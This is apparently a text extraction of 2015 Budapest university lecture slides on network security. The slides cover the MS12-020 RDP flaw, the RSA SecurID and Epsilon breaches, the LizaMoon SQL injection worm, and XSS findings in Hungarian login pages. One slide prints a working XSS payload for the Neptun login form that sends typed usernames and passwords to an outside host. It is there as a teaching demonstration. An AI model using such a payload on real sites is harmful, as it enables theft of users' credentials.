Hálózatbiztonság a. Actual problems, Web vulnerabilities XSS, SQL injection, port scanning: zombie scan. Dr. Bencsáth Boldizsár

Hálózatbiztonság a gyakorlatban BMEVIHIM327 Actual problems, Web vulnerabilities XSS, SQL injection, port scanning: zombie scan 2015. május 22. Budapest Dr. Bencsáth Boldizsár adjunktus BME Híradástechnikai Tanszék bencsath@crysys.hit.bme.hu

2012 MS12-020 RDP flaw RDP flaw allows unauthenticated users remotely to gain kernel level access in windows Workaround: network level authentication (only supported by Vista and up) Reported by Luigi Auriemma to ZDI 05/2011 Patch on March/2012 patch Tuesday PoC on 15/03/2012 PoC is a copy of the MAPP report strange http://aluigi.org/adv/ms12-020_leak.txt http://t.co/j16u3ei5 2

3

4

5

6

7

8

Attack on RSA RSA Says SecurID Hack Based On Phishing With Flash 0-Day Trailrunner7 writes "RSA confirmed on Friday that the attack that compromised the company's high-value SecurID product was essentially a small, targeted phishing campaign that included a payload of a malicious Flash object embedded in an Excel file. "The attacker in this case sent two different phishing emails over a twoday period. The two emails were sent to two small groups of employees; you wouldn t consider these users particularly high profile or high value targets. The email subject line read '2011 Recruitment Plan," Uri Rivner, head of new technologies in the identity protection division of RSA wrote in a post on the attack. The attacker first harvested access credentials from the compromised users (user, domain admin, and service accounts). They performed privilege escalation on non-administrative users in the targeted systems, and then moved on to gain access to key high value targets, which included process experts and IT and Non-IT specific server administrators advanced persistent threat (APT) attack http://blogs.rsa.com/rivner/anatomy-of-an-attack/ 9

10

Lessons leaned Even big, security related companies can be hacked Their anti-virus did not recognize a modified old rootkit Hackers successfully maintained ingoing and outgoing traffic ( covert channel) for a long time 0-day exploits are hard to handle Social engineering always works It s scary how easy to get admin rights after compromising user system (in a big company) RSA did not disclose what did the attackers reach. Is the seed database compromised? What are the consequences? Are SecureID tokens useless? - in this case obscurity surely does not mean security, instead, they loose trust. 11

Epsilon cracked "It turns out that Kroger is only one of many customers affected by the breach at Epsilon, which sends over 40 billion emails annually and counts over 2,500 clients, including 7 of the Fortune 10, to build and host their customer databases. It has been confirmed that the customer names and email addresses, and in a few cases other pieces of information, were compromised at several major brands, a list which continues to grow..." Major Breach at World's Largest Permission Based Email Marketing Services Company Affects Wide Range of Major Brands - List Continues to Grow 12

Affected companies of Epsilon breach TiVo Marriott Rewards Ritz-Carlton Rewards US Bank JPMorgan Chase Capital One Citi McKinsey & Company New York & Company Brookstone Kroger Walgreens 13

Notification of affected users TiVo Service Announcement Dear TiVo Customer, Today we were informed by our email service provider that your email address was exposed due to unauthorized access of their system. Our email service provider deploys emails on our behalf to customers who have opted into email-based communications from us. We were advised by our email service provider that the information that was obtained was limited to first name and/or email addresses only. Your service and any other personally identifiable information were not at risk and remain secure. Please note, it is possible you may receive spam email messages as a result. We want to urge you to be cautious when opening links or attachments from unknown third parties. We regret this has taken place and apologize for any inconvenience this may have caused you. We take your privacy very seriously, and we will continue to work diligently to protect your personal information. If you have unsubscribed in the past, there is no need to unsubscribe again. Your preferences will remain in place. Sincerely, The TiVo Team 14

Epsilon Some may dismiss the type of data harvested as a minor threat, but having access to customer lists opens the opportunity for targeted phishing attacks to customers who expect communications from these brands. eing able to send a targeted phishing message to a bank customer and personally address them by name will certainly result in a much higher hit rate than a typical blind spamming campaign would yield. 15

SQL injection based worm Hundreds of thousands of URLs have been affected by a massive SQLinjection attack, according to security specialist Websense. LizaMoon Affected sites are easy to spot by searching for the line of JavaScript that the attack inserts into a page, which links to a site called Liza Moon. Several itunes URLs have been compromised with the injected code, according to Websense though as Apple's system doesn't execute the code, users are presumed safe. A scareware file is installed on the site in the process, which then beguiles the user into believing that the computer is infected with viruses by displaying a fake Trojan alert. The malicious file then sells a software to the unsuspecting customer which offers to fix the malady. Besides the money spent on the bogus scareware, the multi-stage attack compromises the system security. 16

17

??? 18

Lessons learned SQL injection is easy to and You have to protect against it If something remains unpatched for a long time, someone will crack it If it is a mass problem, sooner or later worms, Internet-wide scans will happen 19

Hint: You cannot manage browser plugins security updates A great tool is available The Qualys BrowserCheck plug-in works across multiple browsers including Internet Explorer, Firefox, Chrome and Opera, on multiple operating systems. Install the plugin, restart the browser, click the blue Scan Now button, and the results should let you know if there are any security or stability updates available for your installed plug-ins (a list of the plug-ins and add-ons that this program can check is available here). 20

21

22

XSS vulnerability found by Acunetix scanner 23

Ha az egeret a user részre visszük, 24

Nexon XSS: Have a look inside <!-- Üres sor (hogy a bejelentkezés képrészletbe ne írjunk bele) --> <tr> <td height="60" colspan="4"> </td> </tr> <!-- Felhasználói név --> <tr> <td width="310"></td> <td class="subtitle" width="85" align="right">felhasználó: </td> <td width="149"> <input type="text" name="vstrusername" id="vstrusername" style="width: 80%" size="20" value="" onmouseover=prompt(938492) bad=""> </td> <td width="30"> </td> </tr> 25

Neptun XSS found by Acunetix scanner 26

Details. http://neptun.bme.huzz/?res=aa%22 -> <form name="login" method="post" action="include/setcookie.php?res=aa""> http://10.105.1.48/neptun/?res=%22%20onsubmit=%22%2 0im=new%20Image;%20im.src=%27http://www.crysys.hu/n eptun/%27%2bdocument.forms[0].uname.value%2b%27:% 27%2bdocument.forms[0].passwd.value Results in: method="post" action="include/setcookie.php?res=" onsubmit=" im=new Image; im.src='http://www.crysys.hu/neptun/'+document.forms[0].u name.value+':'+document.forms[0].passwd.value"> 27

28

29

Kérdések? KÖSZÖNÖM A FIGYELMET! Dr. Bencsáth Boldizsár adjunktus BME Híradástechnikai Tanszék bencsath@crysys.hit.bme.hu 30